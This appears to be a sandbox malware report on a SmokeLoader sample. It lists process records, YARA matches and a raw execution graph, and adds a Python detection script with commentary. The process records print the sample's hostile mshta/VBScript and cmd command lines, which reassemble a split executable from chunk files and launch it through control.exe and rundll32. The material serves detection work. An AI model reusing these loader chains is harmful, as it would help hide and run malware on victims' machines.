                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\user\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\user\AppData\Local\Temp\09xU.exE"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
                                      Imagebase:0x830000
                                      File size:13'312 bytes
                                      MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:41
                                      Start time:04:57:12
                                      Start date:21/08/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\user\AppData\Local\Temp\09xU.exE" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\user\AppData\Local\Temp\09xU.exE" ) do taskkill /F -Im "%~NxU"
                                      Imagebase:0x240000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:42
                                      Start time:04:57:12
                                      Start date:21/08/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:43
                                      Start time:04:57:13
                                      Start date:21/08/2024
                                      Path:C:\Windows\System32\svchost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                      Imagebase:0x7ff6eef20000
                                      File size:55'320 bytes
                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:45
                                      Start time:04:57:15
                                      Start date:21/08/2024
                                      Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                      Imagebase:0x7ff693ab0000
                                      File size:496'640 bytes
                                      MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                      Has elevated privileges:true
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:47
                                      Start time:04:57:17
                                      Start date:21/08/2024
                                      Path:C:\Windows\explorer.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\Explorer.EXE
                                      Imagebase:0x7ff72b770000
                                      File size:5'141'208 bytes
                                      MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000002F.00000002.4156074692.0000000003441000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000002F.00000002.4156074692.0000000003441000.00000020.80000000.00040000.00000000.sdmp, Author: unknown
                                      Has exited:false

                                      Target ID:48
                                      Start time:04:57:17
                                      Start date:21/08/2024
                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 8076 -s 864
                                      Imagebase:0x950000
                                      File size:483'680 bytes
                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:49
                                      Start time:04:57:17
                                      Start date:21/08/2024
                                      Path:C:\Windows\SysWOW64\mshta.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " , 0 ,TRuE ) )
                                      Imagebase:0x830000
                                      File size:13'312 bytes
                                      MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:50
                                      Start time:04:57:18
                                      Start date:21/08/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I
                                      Imagebase:0x240000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:51
                                      Start time:04:57:18
                                      Start date:21/08/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:53
                                      Start time:04:57:18
                                      Start date:21/08/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\system32\cmd.exe /S /D /c" eCHO "
                                      Imagebase:0x240000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:54
                                      Start time:04:57:18
                                      Start date:21/08/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"
                                      Imagebase:0x240000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:55
                                      Start time:04:57:18
                                      Start date:21/08/2024
                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 8076 -s 872
                                      Imagebase:0x950000
                                      File size:483'680 bytes
                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:56
                                      Start time:04:57:18
                                      Start date:21/08/2024
                                      Path:C:\Windows\SysWOW64\control.exe
                                      Wow64 process (32bit):true
                                      Commandline:control .\R6f7sE.I
                                      Imagebase:0x820000
                                      File size:149'504 bytes
                                      MD5 hash:EBC29AA32C57A54018089CFC9CACAFE8
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:57
                                      Start time:04:57:19
                                      Start date:21/08/2024
                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I
                                      Imagebase:0x490000
                                      File size:61'440 bytes
                                      MD5 hash:889B99C52A60DD49227C5E485A016679
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:Borland Delphi
                                      Yara matches:
                                      • Rule: JoeSecurity_Crypt, Description: Yara detected CryptOne packer, Source: 00000039.00000002.1968824084.0000000005240000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      Has exited:true
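The four processes above (Target IDs 49, 50, 56 and 57) form one living-off-the-land chain: mshta.exe runs an inline `vbscript:` one-liner, which spawns cmd.exe; `echo | set /p = "MZ" > ScMeAP.SU` writes the two bytes `MZ` with no trailing newline, `copy /b` appends the dropped chunk files to that stub, and the reassembled file is launched as a Control Panel item through control.exe, which hands it to rundll32.exe with `Shell32.dll,Control_RunDLL`. The point of splitting off the first two bytes is that none of the chunk files on disk carries the `MZ` magic, so a scanner that keys on PE headers of dropped files sees nothing. The following Python is an added example, not part of the Joe Sandbox report: it parses the report's own command lines, reassembles constructed chunk bytes the way `copy /b` would, and runs a few hypothetical detection rules over constructed process telemetry. The PIDs, the rule names and regexes, and the chunk contents are all assumptions made for the example.

```python
import re
import struct
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record (constructed; PIDs are made up, command lines are the report's)."""
    pid: int
    ppid: int
    image: str
    cmdline: str


MSHTA_CMD = ('"C:\\Windows\\System32\\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( '
             '"cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH '
             '+ 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\\R6f7sE.I " , 0 ,TRuE ) )')
CMD_CMD = ('"C:\\Windows\\System32\\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU '
           '+ 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\\R6f7sE.I')

EVENTS = [
    ProcEvent(1001, 999, r"C:\Windows\SysWOW64\mshta.exe", MSHTA_CMD),
    ProcEvent(1002, 1001, r"C:\Windows\SysWOW64\cmd.exe", CMD_CMD),
    ProcEvent(1003, 1002, r"C:\Windows\SysWOW64\control.exe", r"control .\R6f7sE.I"),
    ProcEvent(1004, 1003, r"C:\Windows\SysWOW64\rundll32.exe",
              r'"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I'),
    ProcEvent(1005, 999, r"C:\Windows\System32\control.exe", "control timedate.cpl"),  # benign control
]

# Hypothetical rules: (regex on lower-cased image path, regex on normalised command line).
RULES = {
    "mshta_inline_script": (r"mshta\.exe", r"\b(?:vbscript|javascript):"),
    "mz_header_via_set_p": (r"(?:cmd|mshta)\.exe", r'set /p\s*=\s*"*mz"*\s*>'),
    "copy_b_concat": (r"(?:cmd|mshta)\.exe", r"copy /b\b[^&]*\+"),
    "control_non_cpl": (r"control\.exe", r"control (?!.*\.cpl\b)\S"),
    "rundll32_control_rundll_non_cpl": (r"rundll32\.exe", r"shell32\.dll,control_rundll (?!.*\.cpl\b)\S"),
}


def norm(cmd: str) -> str:
    """Case-fold and collapse whitespace so the sample's random casing and spacing cannot dodge the regexes."""
    return re.sub(r"\s+", " ", cmd).lower()


def evaluate(events):
    """Map pid -> set of rule names that fired on that process (only processes with at least one hit)."""
    hits = {}
    for ev in events:
        fired = {name for name, (img_re, cmd_re) in RULES.items()
                 if re.search(img_re, ev.image.lower()) and re.search(cmd_re, norm(ev.cmdline))}
        if fired:
            hits[ev.pid] = fired
    return hits


def lineage(events, pid):
    """PIDs of the ancestors of pid that are present in the telemetry, nearest first."""
    by_pid = {e.pid: e for e in events}
    out = []
    while pid in by_pid and by_pid[pid].ppid in by_pid:
        pid = by_pid[pid].ppid
        out.append(pid)
    return out


def chain_alerts(events):
    """PIDs of control/rundll32 launches of a non-.cpl file whose ancestry built that file (stub + copy /b)."""
    hits = evaluate(events)
    launch = {"control_non_cpl", "rundll32_control_rundll_non_cpl"}
    build = {"mshta_inline_script", "mz_header_via_set_p", "copy_b_concat"}
    return [ev.pid for ev in events
            if hits.get(ev.pid, set()) & launch
            and any(hits.get(a, set()) & build for a in lineage(events, ev.pid))]


def parse_copy_b(cmdline):
    """Recover (input chunks in order, output file) from a 'copy /b a + b + c out' fragment, or None."""
    m = re.search(r"(?i)copy\s+(?:/[by]\s+)+(.*?)\s*(?:&|$)", cmdline)
    if not m:
        return None
    pieces = [p.strip() for p in m.group(1).split("+")]
    last = pieces[-1].split()          # final piece is "<last chunk> <output file>"
    return pieces[:-1] + [last[0]], last[-1]


# Constructed stand-in for the dropped chunks: a minimal DOS header + "PE\0\0" signature, sliced so that
# only the 2-byte stub written by 'set /p' carries the MZ magic. Keys are lower-case because NTFS is
# case-insensitive, which is why the sample's ScMeAP.SU / ScMeAp.SU spelling mismatch still works.
_PE_STUB = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40) + b"PE\0\0" + b"\0" * 20
CHUNKS = {
    "scmeap.su": _PE_STUB[:2],        # what 'echo | set /p = "MZ" > ScMeAP.SU' leaves on disk
    "20l2vno.2": _PE_STUB[2:40],
    "guvil5.sch": _PE_STUB[40:60],
    "7tcinejp.0": _PE_STUB[60:70],
    "ykifdqa.1": _PE_STUB[70:],
}


def reassemble(chunks, parts):
    """Mimic 'copy /b': byte-concatenate the named chunks in command-line order."""
    return b"".join(chunks[p.lower()] for p in parts)


def looks_like_pe(data: bytes) -> bool:
    """MZ magic plus a 'PE\\0\\0' signature at e_lfanew; enough to show which files a header scan would catch."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


if __name__ == "__main__":
    parts, out = parse_copy_b(CMD_CMD)
    print("chunks:", parts, "->", out)
    print("chunk files that look like PE:", [n for n, c in CHUNKS.items() if looks_like_pe(c)])
    print("reassembled looks like PE:", looks_like_pe(reassemble(CHUNKS, parts)))
    print("rule hits:", evaluate(EVENTS))
    print("chain alerts on PIDs:", chain_alerts(EVENTS))
```

The chain logic deliberately requires both halves: a control.exe or rundll32.exe `Control_RunDLL` launch of something that is not a `.cpl`, and a build step (inline mshta script, the `set /p` MZ stub, or a `copy /b` concatenation) somewhere in its ancestry. Either half alone is noisy on real endpoints; the combination, with whitespace and case normalised first, is what separates this sample's chain from a user opening `timedate.cpl`.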

                                      Target ID:59
                                      Start time:04:57:20
                                      Start date:21/08/2024
                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 8076 -s 900
                                      Imagebase:0x950000
                                      File size:483'680 bytes
                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:61
                                      Start time:04:57:22
                                      Start date:21/08/2024
                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 8076 -s 1064
                                      Imagebase:0x950000
                                      File size:483'680 bytes
                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true


                                        Execution Graph

                                        Execution Coverage:11.8%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:20.6%
                                        Total number of Nodes:1386
                                        Total number of Limit Nodes:16
                                        [Execution graph node and edge data omitted here; it is rendered by the report's interactive graph viewer. The graph enumerates the sample's internal functions (addresses in the 0x401000 to 0x407fff range) and the Windows APIs each reaches, including CreateDirectoryW, SetFileSecurityW, SetCurrentDirectoryW, GetTempPathW, GetTempFileNameW, CreateFileW/ReadFile/WriteFile/SetFilePointer, CopyFileW, MoveFileExW, DeleteFileW, CreateProcessW, ShellExecuteExW, LoadLibraryExW/GetProcAddress, RegOpenKeyExW/RegQueryValueExW, SetEnvironmentVariableW, OpenProcessToken/LookupPrivilegeValueW/AdjustTokenPrivileges followed by ExitWindowsEx, and OpenClipboard/SetClipboardData.]
3807->3785 3808->3775 3809->3776 4188 401a72 4189 402d1c 17 API calls 4188->4189 4190 401a7b 4189->4190 4191 402d1c 17 API calls 4190->4191 4192 401a20 4191->4192 4193 401573 4194 401583 ShowWindow 4193->4194 4195 40158c 4193->4195 4194->4195 4196 40159a ShowWindow 4195->4196 4197 402bc2 4195->4197 4196->4197 4198 4014f5 SetForegroundWindow 4199 402bc2 4198->4199 4200 401ff6 4201 402d3e 17 API calls 4200->4201 4202 401ffd 4201->4202 4203 40689a 2 API calls 4202->4203 4204 402003 4203->4204 4206 402014 4204->4206 4207 406483 wsprintfW 4204->4207 4207->4206 4208 401b77 4209 402d3e 17 API calls 4208->4209 4210 401b7e 4209->4210 4211 402d1c 17 API calls 4210->4211 4212 401b87 wsprintfW 4211->4212 4213 402bc2 4212->4213 4214 4022f7 4215 402d3e 17 API calls 4214->4215 4216 4022fd 4215->4216 4217 402d3e 17 API calls 4216->4217 4218 402306 4217->4218 4219 402d3e 17 API calls 4218->4219 4220 40230f 4219->4220 4221 40689a 2 API calls 4220->4221 4222 402318 4221->4222 4223 402329 lstrlenW lstrlenW 4222->4223 4227 40231c 4222->4227 4225 4055a4 24 API calls 4223->4225 4224 4055a4 24 API calls 4228 402324 4224->4228 4226 402367 SHFileOperationW 4225->4226 4226->4227 4226->4228 4227->4224 4227->4228 4236 40167b 4237 402d3e 17 API calls 4236->4237 4238 401682 4237->4238 4239 402d3e 17 API calls 4238->4239 4240 40168b 4239->4240 4241 402d3e 17 API calls 4240->4241 4242 401694 MoveFileW 4241->4242 4243 4016a0 4242->4243 4244 4016a7 4242->4244 4245 401423 24 API calls 4243->4245 4246 40689a 2 API calls 4244->4246 4248 4022ee 4244->4248 4245->4248 4247 4016b6 4246->4247 4247->4248 4249 406302 36 API calls 4247->4249 4249->4243 4250 40237b 4251 402382 4250->4251 4255 402395 4250->4255 4252 406579 17 API calls 4251->4252 4253 40238f 4252->4253 4254 405ba2 MessageBoxIndirectW 4253->4254 4254->4255 4256 404eff GetDlgItem GetDlgItem 4257 404f53 7 API calls 4256->4257 4269 40517d 4256->4269 4258 404ff0 SendMessageW 4257->4258 4259 404ffd DeleteObject 4257->4259 4258->4259 4260 405008 
4259->4260 4261 40503f 4260->4261 4263 406579 17 API calls 4260->4263 4264 404492 18 API calls 4261->4264 4262 405265 4265 40530e 4262->4265 4271 405170 4262->4271 4276 4052bb SendMessageW 4262->4276 4266 405021 SendMessageW SendMessageW 4263->4266 4270 405053 4264->4270 4267 405323 4265->4267 4268 405317 SendMessageW 4265->4268 4266->4260 4278 405335 ImageList_Destroy 4267->4278 4279 40533c 4267->4279 4287 40534c 4267->4287 4268->4267 4269->4262 4290 4051ef 4269->4290 4310 404e4d SendMessageW 4269->4310 4275 404492 18 API calls 4270->4275 4273 4044f9 8 API calls 4271->4273 4272 405257 SendMessageW 4272->4262 4277 405511 4273->4277 4291 405064 4275->4291 4276->4271 4281 4052d0 SendMessageW 4276->4281 4278->4279 4282 405345 GlobalFree 4279->4282 4279->4287 4280 4054c5 4280->4271 4285 4054d7 ShowWindow GetDlgItem ShowWindow 4280->4285 4284 4052e3 4281->4284 4282->4287 4283 40513f GetWindowLongW SetWindowLongW 4286 405158 4283->4286 4292 4052f4 SendMessageW 4284->4292 4285->4271 4288 405175 4286->4288 4289 40515d ShowWindow 4286->4289 4287->4280 4301 405387 4287->4301 4315 404ecd 4287->4315 4309 4044c7 SendMessageW 4288->4309 4308 4044c7 SendMessageW 4289->4308 4290->4262 4290->4272 4291->4283 4293 40513a 4291->4293 4297 4050b7 SendMessageW 4291->4297 4299 4050f5 SendMessageW 4291->4299 4300 405109 SendMessageW 4291->4300 4292->4265 4293->4283 4293->4286 4294 4053cb 4302 405491 4294->4302 4306 40543f SendMessageW SendMessageW 4294->4306 4297->4291 4299->4291 4300->4291 4301->4294 4304 4053b5 SendMessageW 4301->4304 4303 40549b InvalidateRect 4302->4303 4305 4054a7 4302->4305 4303->4305 4304->4294 4305->4280 4324 404e08 4305->4324 4306->4294 4308->4271 4309->4269 4311 404e70 GetMessagePos ScreenToClient SendMessageW 4310->4311 4312 404eac SendMessageW 4310->4312 4313 404ea9 4311->4313 4314 404ea4 4311->4314 4312->4314 4313->4312 4314->4290 4327 40653c lstrcpynW 4315->4327 4317 404ee0 4328 406483 wsprintfW 4317->4328 4319 404eea 4320 40140b 2 API calls 4319->4320 4321 
404ef3 4320->4321 4329 40653c lstrcpynW 4321->4329 4323 404efa 4323->4301 4330 404d3f 4324->4330 4326 404e1d 4326->4280 4327->4317 4328->4319 4329->4323 4331 404d58 4330->4331 4332 406579 17 API calls 4331->4332 4333 404dbc 4332->4333 4334 406579 17 API calls 4333->4334 4335 404dc7 4334->4335 4336 406579 17 API calls 4335->4336 4337 404ddd lstrlenW wsprintfW SetDlgItemTextW 4336->4337 4337->4326 4338 4019ff 4339 402d3e 17 API calls 4338->4339 4340 401a06 4339->4340 4341 402d3e 17 API calls 4340->4341 4342 401a0f 4341->4342 4343 401a16 lstrcmpiW 4342->4343 4344 401a28 lstrcmpW 4342->4344 4345 401a1c 4343->4345 4344->4345 4346 401000 4347 401037 BeginPaint GetClientRect 4346->4347 4348 40100c DefWindowProcW 4346->4348 4350 4010f3 4347->4350 4351 401179 4348->4351 4352 401073 CreateBrushIndirect FillRect DeleteObject 4350->4352 4353 4010fc 4350->4353 4352->4350 4354 401102 CreateFontIndirectW 4353->4354 4355 401167 EndPaint 4353->4355 4354->4355 4356 401112 6 API calls 4354->4356 4355->4351 4356->4355 4357 401d81 4358 401d94 GetDlgItem 4357->4358 4359 401d87 4357->4359 4361 401d8e 4358->4361 4360 402d1c 17 API calls 4359->4360 4360->4361 4362 402d3e 17 API calls 4361->4362 4364 401dd5 GetClientRect LoadImageW SendMessageW 4361->4364 4362->4364 4365 401e33 4364->4365 4367 401e3f 4364->4367 4366 401e38 DeleteObject 4365->4366 4365->4367 4366->4367 4368 404602 lstrlenW 4369 404621 4368->4369 4370 404623 WideCharToMultiByte 4368->4370 4369->4370 4371 402902 4372 402d3e 17 API calls 4371->4372 4373 402909 FindFirstFileW 4372->4373 4374 402931 4373->4374 4375 40291c 4373->4375 4379 406483 wsprintfW 4374->4379 4377 40293a 4380 40653c lstrcpynW 4377->4380 4379->4377 4380->4375 4381 402482 4382 402d3e 17 API calls 4381->4382 4383 402494 4382->4383 4384 402d3e 17 API calls 4383->4384 4385 40249e 4384->4385 4398 402dce 4385->4398 4388 4024d6 4392 402d1c 17 API calls 4388->4392 4395 4024e2 4388->4395 4389 402d3e 17 API calls 4391 4024cc lstrlenW 4389->4391 4390 402925 4391->4388 
4392->4395 4393 402501 RegSetValueExW 4394 402517 RegCloseKey 4393->4394 4394->4390 4395->4393 4396 403309 44 API calls 4395->4396 4396->4393 4399 402de9 4398->4399 4402 4063d7 4399->4402 4403 4063e6 4402->4403 4404 4063f1 RegCreateKeyExW 4403->4404 4405 4024ae 4403->4405 4404->4405 4405->4388 4405->4389 4405->4390 4406 401503 4407 40150b 4406->4407 4409 40151e 4406->4409 4408 402d1c 17 API calls 4407->4408 4408->4409 4410 404983 4411 4049c0 4410->4411 4412 4049af 4410->4412 4414 4049cc GetDlgItem 4411->4414 4419 404a2b 4411->4419 4471 405b86 GetDlgItemTextW 4412->4471 4416 4049e0 4414->4416 4415 4049ba 4418 4067eb 5 API calls 4415->4418 4421 4049f4 SetWindowTextW 4416->4421 4426 405ebc 4 API calls 4416->4426 4417 404b0f 4469 404cbe 4417->4469 4473 405b86 GetDlgItemTextW 4417->4473 4418->4411 4419->4417 4423 406579 17 API calls 4419->4423 4419->4469 4424 404492 18 API calls 4421->4424 4422 404b3f 4427 405f19 18 API calls 4422->4427 4428 404a9f SHBrowseForFolderW 4423->4428 4429 404a10 4424->4429 4425 4044f9 8 API calls 4430 404cd2 4425->4430 4431 4049ea 4426->4431 4432 404b45 4427->4432 4428->4417 4433 404ab7 CoTaskMemFree 4428->4433 4434 404492 18 API calls 4429->4434 4431->4421 4435 405e11 3 API calls 4431->4435 4474 40653c lstrcpynW 4432->4474 4436 405e11 3 API calls 4433->4436 4437 404a1e 4434->4437 4435->4421 4438 404ac4 4436->4438 4472 4044c7 SendMessageW 4437->4472 4441 404afb SetDlgItemTextW 4438->4441 4446 406579 17 API calls 4438->4446 4441->4417 4442 404a24 4444 406931 5 API calls 4442->4444 4443 404b5c 4445 406931 5 API calls 4443->4445 4444->4419 4453 404b63 4445->4453 4447 404ae3 lstrcmpiW 4446->4447 4447->4441 4450 404af4 lstrcatW 4447->4450 4448 404ba4 4475 40653c lstrcpynW 4448->4475 4450->4441 4451 404bab 4452 405ebc 4 API calls 4451->4452 4454 404bb1 GetDiskFreeSpaceW 4452->4454 4453->4448 4456 405e5d 2 API calls 4453->4456 4458 404bfc 4453->4458 4457 404bd5 MulDiv 4454->4457 4454->4458 4456->4453 4457->4458 4459 404c6d 4458->4459 4460 404e08 20 
API calls 4458->4460 4461 404c90 4459->4461 4462 40140b 2 API calls 4459->4462 4463 404c5a 4460->4463 4476 4044b4 EnableWindow 4461->4476 4462->4461 4465 404c6f SetDlgItemTextW 4463->4465 4466 404c5f 4463->4466 4465->4459 4468 404d3f 20 API calls 4466->4468 4467 404cac 4467->4469 4470 4048dc SendMessageW 4467->4470 4468->4459 4469->4425 4470->4469 4471->4415 4472->4442 4473->4422 4474->4443 4475->4451 4476->4467 3702 401389 3704 401390 3702->3704 3703 4013fe 3704->3703 3705 4013cb MulDiv SendMessageW 3704->3705 3705->3704 4477 402889 4478 402890 4477->4478 4484 402b0d 4477->4484 4479 402d1c 17 API calls 4478->4479 4480 402897 4479->4480 4481 4028a6 SetFilePointer 4480->4481 4482 4028b6 4481->4482 4481->4484 4485 406483 wsprintfW 4482->4485 4485->4484 4486 40190c 4487 401943 4486->4487 4488 402d3e 17 API calls 4487->4488 4489 401948 4488->4489 4490 405c4e 67 API calls 4489->4490 4491 401951 4490->4491 4492 40190f 4493 402d3e 17 API calls 4492->4493 4494 401916 4493->4494 4495 405ba2 MessageBoxIndirectW 4494->4495 4496 40191f 4495->4496 4504 401491 4505 4055a4 24 API calls 4504->4505 4506 401498 4505->4506 4514 401f12 4515 402d3e 17 API calls 4514->4515 4516 401f18 4515->4516 4517 402d3e 17 API calls 4516->4517 4518 401f21 4517->4518 4519 402d3e 17 API calls 4518->4519 4520 401f2a 4519->4520 4521 402d3e 17 API calls 4520->4521 4522 401f33 4521->4522 4523 401423 24 API calls 4522->4523 4524 401f3a 4523->4524 4531 405b68 ShellExecuteExW 4524->4531 4526 401f82 4528 402925 4526->4528 4532 4069dc WaitForSingleObject 4526->4532 4529 401f9f CloseHandle 4529->4528 4531->4526 4533 4069f6 4532->4533 4534 406a08 GetExitCodeProcess 4533->4534 4535 40696d 2 API calls 4533->4535 4534->4529 4536 4069fd WaitForSingleObject 4535->4536 4536->4533 4537 402614 4538 402d3e 17 API calls 4537->4538 4539 40261b 4538->4539 4542 406032 GetFileAttributesW CreateFileW 4539->4542 4541 402627 4542->4541 4543 402596 4553 402d7e 4543->4553 4546 402d1c 17 API calls 4547 4025a9 4546->4547 4548 4025d1 
RegEnumValueW 4547->4548 4549 4025c5 RegEnumKeyW 4547->4549 4550 402925 4547->4550 4551 4025e6 RegCloseKey 4548->4551 4549->4551 4551->4550 4554 402d3e 17 API calls 4553->4554 4555 402d95 4554->4555 4556 4063a9 RegOpenKeyExW 4555->4556 4557 4025a0 4556->4557 4557->4546 4558 401d17 4559 402d1c 17 API calls 4558->4559 4560 401d1d IsWindow 4559->4560 4561 401a20 4560->4561 4562 405518 4563 405528 4562->4563 4564 40553c 4562->4564 4565 40552e 4563->4565 4574 405585 4563->4574 4566 405544 IsWindowVisible 4564->4566 4572 40555b 4564->4572 4568 4044de SendMessageW 4565->4568 4569 405551 4566->4569 4566->4574 4567 40558a CallWindowProcW 4570 405538 4567->4570 4568->4570 4571 404e4d 5 API calls 4569->4571 4571->4572 4572->4567 4573 404ecd 4 API calls 4572->4573 4573->4574 4574->4567 3706 403b19 3707 403b34 3706->3707 3708 403b2a CloseHandle 3706->3708 3709 403b48 3707->3709 3710 403b3e CloseHandle 3707->3710 3708->3707 3715 403b76 3709->3715 3710->3709 3716 403b84 3715->3716 3717 403b4d 3716->3717 3718 403b89 FreeLibrary GlobalFree 3716->3718 3719 405c4e 3717->3719 3718->3717 3718->3718 3720 405f19 18 API calls 3719->3720 3721 405c6e 3720->3721 3722 405c76 DeleteFileW 3721->3722 3723 405c8d 3721->3723 3752 403b59 3722->3752 3724 405dad 3723->3724 3755 40653c lstrcpynW 3723->3755 3731 40689a 2 API calls 3724->3731 3724->3752 3726 405cb3 3727 405cc6 3726->3727 3728 405cb9 lstrcatW 3726->3728 3730 405e5d 2 API calls 3727->3730 3729 405ccc 3728->3729 3732 405cdc lstrcatW 3729->3732 3734 405ce7 lstrlenW FindFirstFileW 3729->3734 3730->3729 3733 405dd2 3731->3733 